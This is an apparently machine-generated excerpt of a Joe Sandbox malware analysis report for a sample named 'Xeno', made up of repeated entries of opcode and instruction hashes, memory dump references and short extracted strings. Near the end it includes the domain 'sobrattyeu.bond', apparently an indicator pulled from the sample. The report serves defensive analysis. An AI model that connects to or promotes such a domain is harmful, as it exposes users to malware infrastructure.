                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: Dj 6$xj 6$TZ
                            • API String ID: 0-3647110430
                            • Opcode ID: bcbfe4d58ed1d171df67d66486e11a9aa749ce79f2fe901e7943871f3a12fb7e
                            • Instruction ID: 72569dd730581e9f35e6bfb91f95e06f3f7fc9e887c83017d5111127008db0c6
                            • Opcode Fuzzy Hash: bcbfe4d58ed1d171df67d66486e11a9aa749ce79f2fe901e7943871f3a12fb7e
                            • Instruction Fuzzy Hash: D751D0B160C3609BD7209F25D81166BBBF1EFDA318F18896DE4D54B391E3399901CB8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: Dj 6$xj 6$TZ
                            • API String ID: 0-3647110430
                            • Opcode ID: 49f3aea8cf22f3d8992e851adeb2b8286ecbcb7481062874cd26e18624d557bd
                            • Instruction ID: 9565bb60ada243023f45df5d5459273736da917ad741ec0fea6f9f997e26b79d
                            • Opcode Fuzzy Hash: 49f3aea8cf22f3d8992e851adeb2b8286ecbcb7481062874cd26e18624d557bd
                            • Instruction Fuzzy Hash: 7151EFB160C3609BD7209F25D81166BBBF1EFDA318F18895DE4D54B391E3398901CB8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$.$K
                            • API String ID: 0-4278605028
                            • Opcode ID: 4814c4e0a18d5f91a188e00bbfd94b8d470bec3eb64053db4bd1cde425b39007
                            • Instruction ID: 18cd5467b6d47afcda196380cdd8e9db46cfe15a55f318c2accd4e50a7af4828
                            • Opcode Fuzzy Hash: 4814c4e0a18d5f91a188e00bbfd94b8d470bec3eb64053db4bd1cde425b39007
                            • Instruction Fuzzy Hash: 6D51007050D3C08BD36A873994607ABBFE16F96304F184E6EE1E747392CA698245CB57
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$8
                            • API String ID: 0-46163386
                            • Opcode ID: fc36de11d7acb18c79bfa19ae9b6979b7893688525030db6cb1e95aed024fa94
                            • Instruction ID: 7197625b11bac423ad23b6a4f358e90d8c28833f2930a027053b107a40c6ca91
                            • Opcode Fuzzy Hash: fc36de11d7acb18c79bfa19ae9b6979b7893688525030db6cb1e95aed024fa94
                            • Instruction Fuzzy Hash: 12722371508340AFD714CF18C884BABBBE1BF88314F04892EF9999B391D779D958CB96
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: <=$E
                            • API String ID: 0-1774780486
                            • Opcode ID: 81bab8f63a0c46f66f0d3fd221322a1e9c90d1edcf5bdeac7fbb6f6a68ae1596
                            • Instruction ID: c37952f61dcd2cdc74209d2ec3eb9f0b33311c0495ad4ce3caea392dc4c2e7bb
                            • Opcode Fuzzy Hash: 81bab8f63a0c46f66f0d3fd221322a1e9c90d1edcf5bdeac7fbb6f6a68ae1596
                            • Instruction Fuzzy Hash: AF221136518315CBD7189F28E8923ABB3E2FF99300F0AD83DD98587391E7799944C746
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: GCA$NP,?
                            • API String ID: 0-1543269465
                            • Opcode ID: 2be00618527785d4e33da7150d28a8cfa5933b3d63f06e0c5ba8f6ced1d8bdf2
                            • Instruction ID: a0862f6a63456e9e6b23b14fa2e6b23474a0e5f3fe38dc22a47ef80134351fd0
                            • Opcode Fuzzy Hash: 2be00618527785d4e33da7150d28a8cfa5933b3d63f06e0c5ba8f6ced1d8bdf2
                            • Instruction Fuzzy Hash: A9E121B8214200EFE7148F15EC41B6B73A1FBCA329F144A2DF599572E1D739AC91CB49
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: EEFG$q;
                            • API String ID: 0-1599080334
                            • Opcode ID: 29556f3e094b972c0239b34301c3d4ef565ccae3cd6b535a51a9f414f61ad031
                            • Instruction ID: 28bf1a67f820df0091446aafb65e6e37692207d9442259d2e0f34fe107c18eb1
                            • Opcode Fuzzy Hash: 29556f3e094b972c0239b34301c3d4ef565ccae3cd6b535a51a9f414f61ad031
                            • Instruction Fuzzy Hash: 6AC134B15183108BC724DF28C8917ABB7F1FF92354F188A2DE5D54B3A0E7789846CB96
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: PKA$gKA
                            • API String ID: 0-3458973595
                            • Opcode ID: 122b4ccff0ef283a645d78e9cc8c6f7b365c0673ce676b3999daa562c221dc9e
                            • Instruction ID: 5196666aa9b314b536e5a3064005e8d0b0ebf2aaa6e22db81686803c1f092df5
                            • Opcode Fuzzy Hash: 122b4ccff0ef283a645d78e9cc8c6f7b365c0673ce676b3999daa562c221dc9e
                            • Instruction Fuzzy Hash: 27D169B5609300DFD7249F24D8917AB73A1FFC6364F04862DE4958B3A1EB789841C79B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 94$^^\S
                            • API String ID: 0-2728499901
                            • Opcode ID: 00a93db577abf90da65751e3af12115cbb9cfdedb4c8579be2347975681bf90a
                            • Instruction ID: 105de99c08bdbff08113f1d2c39399fb31abda8af8dfa5bee4ee88022bf6ea35
                            • Opcode Fuzzy Hash: 00a93db577abf90da65751e3af12115cbb9cfdedb4c8579be2347975681bf90a
                            • Instruction Fuzzy Hash: 98A1037124C3815BD3168F7994A076BFFE19F97304F0849BDE4D59B382C239890AC75A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: )$IEND
                            • API String ID: 0-707183367
                            • Opcode ID: c1d4e1f2d27d79bd6e73e4f111654da6eea159fbd771e736c4c88191a55ab19c
                            • Instruction ID: 3deca869f47dbc6e1f2dd954d9342126f6a499d7f2618c59535dd5afa0287d26
                            • Opcode Fuzzy Hash: c1d4e1f2d27d79bd6e73e4f111654da6eea159fbd771e736c4c88191a55ab19c
                            • Instruction Fuzzy Hash: 65D1A3B1A083449FD710CF14D84575BBBE4AB94308F14492EFA99AB3C2D779E908CB97
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$V
                            • API String ID: 0-2831821285
                            • Opcode ID: c95eeef50b39d7aca81d468704dd7c23b175f4ef043a2f4d827d6a90ba8aa324
                            • Instruction ID: 02fb41d872a521f5660d48750de83f1acadc345e7b74cb2622ac1b31c9156c78
                            • Opcode Fuzzy Hash: c95eeef50b39d7aca81d468704dd7c23b175f4ef043a2f4d827d6a90ba8aa324
                            • Instruction Fuzzy Hash: D1916A32A8C7D447C31849BC5C553EA7E920BD2230F1CC37EE9B5873D2D56C8946938A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$15M2
                            • API String ID: 0-1724839869
                            • Opcode ID: 2c4e8ad769910b0e2da5f010131ce9121b23f5140e23058c09ebdad6c18c3e3f
                            • Instruction ID: d8d3bf99ae2d4d757a7bf0e38792a605ca262b74009a69b878583df991406498
                            • Opcode Fuzzy Hash: 2c4e8ad769910b0e2da5f010131ce9121b23f5140e23058c09ebdad6c18c3e3f
                            • Instruction Fuzzy Hash: 015127A060C3928BE719CF39A07173B7FD19FD3705F24895EE0C297282C66CC90A875A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$15M2
                            • API String ID: 0-1724839869
                            • Opcode ID: be7d70423d818604852b46b523abb94a2d669e98b312115888eb2af366895202
                            • Instruction ID: c04aa28caec7d6050f94680ade6de8178e81235f19a31a752b03d92c54447247
                            • Opcode Fuzzy Hash: be7d70423d818604852b46b523abb94a2d669e98b312115888eb2af366895202
                            • Instruction Fuzzy Hash: 1551056060C3928BE719CE39A47173B7FD19FD3705F24495EE4C29B382C66CC90A876A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: Ft$Ft
                            • API String ID: 0-816386971
                            • Opcode ID: 26557002a04958d360b7c086660a5e114be23b61f72cd9ecb2307eeea2ffc125
                            • Instruction ID: 9888aa4a110475c1d87c223a705ee45e8b96713c53b15abc4ae8fee1b961ea07
                            • Opcode Fuzzy Hash: 26557002a04958d360b7c086660a5e114be23b61f72cd9ecb2307eeea2ffc125
                            • Instruction Fuzzy Hash: 655133B15083918FD724DF25C4A16ABBBF4EF93744F08495DE4C19B351E378890ACB96
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$15M2
                            • API String ID: 0-1724839869
                            • Opcode ID: be366aa7ef4912d8ce9537d6d1916a0c76447426e2bbdead2f13f1ea346940a8
                            • Instruction ID: 79c2e9541493bc54a9d497453eec8b3057f6d7a7314f9701e2d9d32576e1f65d
                            • Opcode Fuzzy Hash: be366aa7ef4912d8ce9537d6d1916a0c76447426e2bbdead2f13f1ea346940a8
                            • Instruction Fuzzy Hash: 0551086060C3928BE715CF29A47177BBFD19FD3705F28495EE0C25B282D668850A87AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$15M2
                            • API String ID: 0-1724839869
                            • Opcode ID: fbe9682165b494f0d6dc42cf9df35efa7ed02f8eadf4e66d95e7ff25ca12fb0c
                            • Instruction ID: e5380c79a96e78b6117fd63b3df3a9df5e27214a7769bd173fd312d3ca87ccf8
                            • Opcode Fuzzy Hash: fbe9682165b494f0d6dc42cf9df35efa7ed02f8eadf4e66d95e7ff25ca12fb0c
                            • Instruction Fuzzy Hash: 1E51F86060C3928BE715CF29A47177BBFD19FD3705F28495DE4C25B282D278850A87AB
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: N$VNRL
                            • API String ID: 0-3545530786
                            • Opcode ID: 8adbbb97136974072c05d9f31256350b89ec356d3b9f5b1e23735bab8db4d35d
                            • Instruction ID: d92eb9b8a73a99f7a89e8e6121f63dbf7f452b34976713005460d141eb761e01
                            • Opcode Fuzzy Hash: 8adbbb97136974072c05d9f31256350b89ec356d3b9f5b1e23735bab8db4d35d
                            • Instruction Fuzzy Hash: FA512B7260C3A18BD724CF3A98903ABFBD2AFD7310F198A6ED4D947391D77548068786
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: G'I!$I+5U
                            • API String ID: 0-3982469033
                            • Opcode ID: a34cc5b98ecda74216b54885ebf6feacb799be7facf0d732b231c330b8b92638
                            • Instruction ID: 0c37e6b0bbb2cef1c6114b6db361c8c1cee858d25acd2bf1e4e1587d6e24da40
                            • Opcode Fuzzy Hash: a34cc5b98ecda74216b54885ebf6feacb799be7facf0d732b231c330b8b92638
                            • Instruction Fuzzy Hash: B33187B05083519BC314CF15D89162BBAF1EF82754F099A2DF4DA5B720E7788901CB4A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8230$8230
                            • API String ID: 0-3715803118
                            • Opcode ID: fd6fd82e7844b2da102b34223c046c7b7e0bee97ac1f011841723bb8ffc28060
                            • Instruction ID: 09e9332ac2f142cfff3c19cdd478bbb557e199818922e0d4294f9697a862ebd9
                            • Opcode Fuzzy Hash: fd6fd82e7844b2da102b34223c046c7b7e0bee97ac1f011841723bb8ffc28060
                            • Instruction Fuzzy Hash: 3F11053EF655608BE3188F29C4446ABA2D2D7DA311F1CD66D88DDA7259CE348C81838B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 30
                            • API String ID: 0-2473281379
                            • Opcode ID: 3cbe4532547ec514d44d5ff9ddce2b56253359cd7a5faa645c00dea0d8e88b53
                            • Instruction ID: 6bd67aa98bbdda8fa54e3a5750cb12a3b4a64e14cc2212a902c26c9a915805be
                            • Opcode Fuzzy Hash: 3cbe4532547ec514d44d5ff9ddce2b56253359cd7a5faa645c00dea0d8e88b53
                            • Instruction Fuzzy Hash: 9AB15B71B083608BD7209B24D852777B3E1EF95314F99582EE8C597391E7389C41C79B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: "
                            • API String ID: 0-123907689
                            • Opcode ID: e1b3d67a2ada083b185932ce6c3139d6b3836433607128a7d61e5613d6f14c4e
                            • Instruction ID: 16abfbfe1406be8d20c5b1f6a82626de70634d18a4a41d1934c219b008ff2ba0
                            • Opcode Fuzzy Hash: e1b3d67a2ada083b185932ce6c3139d6b3836433607128a7d61e5613d6f14c4e
                            • Instruction Fuzzy Hash: 92D12272B083209FC714CE64A49076FB7E6AF84314F48896EE89987382D778ED44C7D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: NP,?
                            • API String ID: 2994545307-3110377521
                            • Opcode ID: cb5a79b8f325920f8d3cc8b971d8ce68c3d2610a66d1326b4a512886c66d31ee
                            • Instruction ID: b6f219711519e2a2136208b8bcef6077abda49d6ab366dcdc26f6a8fb8e34ae8
                            • Opcode Fuzzy Hash: cb5a79b8f325920f8d3cc8b971d8ce68c3d2610a66d1326b4a512886c66d31ee
                            • Instruction Fuzzy Hash: 2AA19A756443009BD3248F25D881A3BB397EBCD728F18A62EE5E5073D1D739AC12879B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: Sf?!
                            • API String ID: 0-2685530784
                            • Opcode ID: 4d31cdc7311a0b78a3ee511fbc4d4451a29a4530676fc4fcdad427d4bc59617e
                            • Instruction ID: 848e50da9f92a9d1f8bfdbd2d0439222b35ba032049198bd196cc30c99b35772
                            • Opcode Fuzzy Hash: 4d31cdc7311a0b78a3ee511fbc4d4451a29a4530676fc4fcdad427d4bc59617e
                            • Instruction Fuzzy Hash: E1815C715083108BC714CF28C8527ABB7F2EFD5324F09992DE8DA8B391E7389945C78A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4:;8
                            • API String ID: 0-1665238794
                            • Opcode ID: c5419bf167f590bb2c803b4fe472d2f441fb4a9b03cb45a7dceb0e463b4a8997
                            • Instruction ID: 4da589962028e2cc69ed1b5c9d1435f3dfe4c2b10e657c8f256301ff62b2b6f0
                            • Opcode Fuzzy Hash: c5419bf167f590bb2c803b4fe472d2f441fb4a9b03cb45a7dceb0e463b4a8997
                            • Instruction Fuzzy Hash: 00A15A319086218BC7118E19C94425BB7E2AFC1720F198B7ED8E46B3E5EA3DDC468BC5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: L2
                            • API String ID: 0-186256184
                            • Opcode ID: 94fc44c7d09803d5477b02f2e267ad64020a13267048af0f0a7366688f6910ac
                            • Instruction ID: f21e2cd584cc592dd508e116751ca41a74858fba8db2b7a880d802e56d530856
                            • Opcode Fuzzy Hash: 94fc44c7d09803d5477b02f2e267ad64020a13267048af0f0a7366688f6910ac
                            • Instruction Fuzzy Hash: 4791017265C3449FC708DF59C8516AFFBE2EBC5304F48882DE4D59B312E6389609CB86
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: r~B
                            • API String ID: 0-2170163688
                            • Opcode ID: ba2d9c57199d93cdf80e6d160f8ba6e92baa324358b6a12a53c820edea7c6dd9
                            • Instruction ID: 7166226e75b44e8eaf6fa294b05fbeada620e5489b3bbb3639eff6a45a4f7353
                            • Opcode Fuzzy Hash: ba2d9c57199d93cdf80e6d160f8ba6e92baa324358b6a12a53c820edea7c6dd9
                            • Instruction Fuzzy Hash: 4AA1083160C3A1CFD314CF28D89076AB7E2EF8B310F5A86ADE5954B2D1D735A904C756
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: G%&
                            • API String ID: 0-1540628794
                            • Opcode ID: fce8dd7dccab4b402c4886d58539d4155c5646ba8475f29452c72e6e36abcb42
                            • Instruction ID: 872ea7cbef17f7592675314ca5cefede4d32ffa1df34d834cfe97dee4c58b2ee
                            • Opcode Fuzzy Hash: fce8dd7dccab4b402c4886d58539d4155c5646ba8475f29452c72e6e36abcb42
                            • Instruction Fuzzy Hash: 9A81F1342043069FE7149F68C880A6BB7E1EB89364F54862DF9958B3B1EB39DC91C749
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0
                            • API String ID: 0-4108050209
                            • Opcode ID: cbc0efc6741f2f245a1ba22c5f7ff64902cbe2c94271421e483900c60b384df7
                            • Instruction ID: ec7cbc70f0158c2a01ee5ac80d324b442bc0a40f16a7f08a7b184a3fc104b2ac
                            • Opcode Fuzzy Hash: cbc0efc6741f2f245a1ba22c5f7ff64902cbe2c94271421e483900c60b384df7
                            • Instruction Fuzzy Hash: 38714932B897854BC31899BC5C812EEBA934BD7330F2CC3BAD9B1873E5D56849469349
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: RP
                            • API String ID: 0-2004230831
                            • Opcode ID: 52b4266fadbcddcdf81c0e7e7e132d56fc8f8bff9a0980d5883735d9d6a7e08e
                            • Instruction ID: f2e06192cff92b9304cbddec49ab8680b7c3fe636ca01c469911e9ba8dd640b3
                            • Opcode Fuzzy Hash: 52b4266fadbcddcdf81c0e7e7e132d56fc8f8bff9a0980d5883735d9d6a7e08e
                            • Instruction Fuzzy Hash: 367117152145914ADB2CCF7588923377AD69F8470DF2881BFC955CFADBE938C2038749
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: wt
                            • API String ID: 0-1993296107
                            • Opcode ID: 631aab08cac6b9f7680146f3f3af4b981a59ddf06376f59a6bd4bafadce0c253
                            • Instruction ID: 4a80c9fa56816353ffe6980b2ca108c691517d218e42b42e183a8e5cef874030
                            • Opcode Fuzzy Hash: 631aab08cac6b9f7680146f3f3af4b981a59ddf06376f59a6bd4bafadce0c253
                            • Instruction Fuzzy Hash: 1E41CBB054C3908BC3309F25A8017AFBBF0FB92348F50496DE4D9AB211D3398949CB9B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: 8230
                            • API String ID: 2994545307-3783682864
                            • Opcode ID: d8483902784e992d537755dd4b59732ae0f36d51919b2235ababe292223e5f2d
                            • Instruction ID: 41a12a369cbaee4b10645b1184549661eaa42bebd33bd1e468a9e18b3bf6d82b
                            • Opcode Fuzzy Hash: d8483902784e992d537755dd4b59732ae0f36d51919b2235ababe292223e5f2d
                            • Instruction Fuzzy Hash: 48219838A14510EFD3248F18CC40BBB7256E7DA724F2C872DD4A9172E6DB351C82838E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: ?<
                            • API String ID: 0-912802884
                            • Opcode ID: 25535c7affac2d1ecf3fd4a1c1079dd18d54a6ea31284e2c4c078e706ffefbe6
                            • Instruction ID: 72500fb80886c93aeb45446100695d8df0453a01af19de91a6ee71012857e070
                            • Opcode Fuzzy Hash: 25535c7affac2d1ecf3fd4a1c1079dd18d54a6ea31284e2c4c078e706ffefbe6
                            • Instruction Fuzzy Hash: 2E21C6757483405BD3149F14DC917BFBBE2EBC6710F259A2DE9D257390CA3C98069B0A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: sobrattyeu.bond
                            • API String ID: 0-1398321731
                            • Opcode ID: 45182aadf4d43d616d438691d66d717b924e10250a2454419b70452a06fe7fec
                            • Instruction ID: 78db256e88ca22536546643472c1f2bb2ef1d62ca8b443b2cdfb421d5753d9a6
                            • Opcode Fuzzy Hash: 45182aadf4d43d616d438691d66d717b924e10250a2454419b70452a06fe7fec
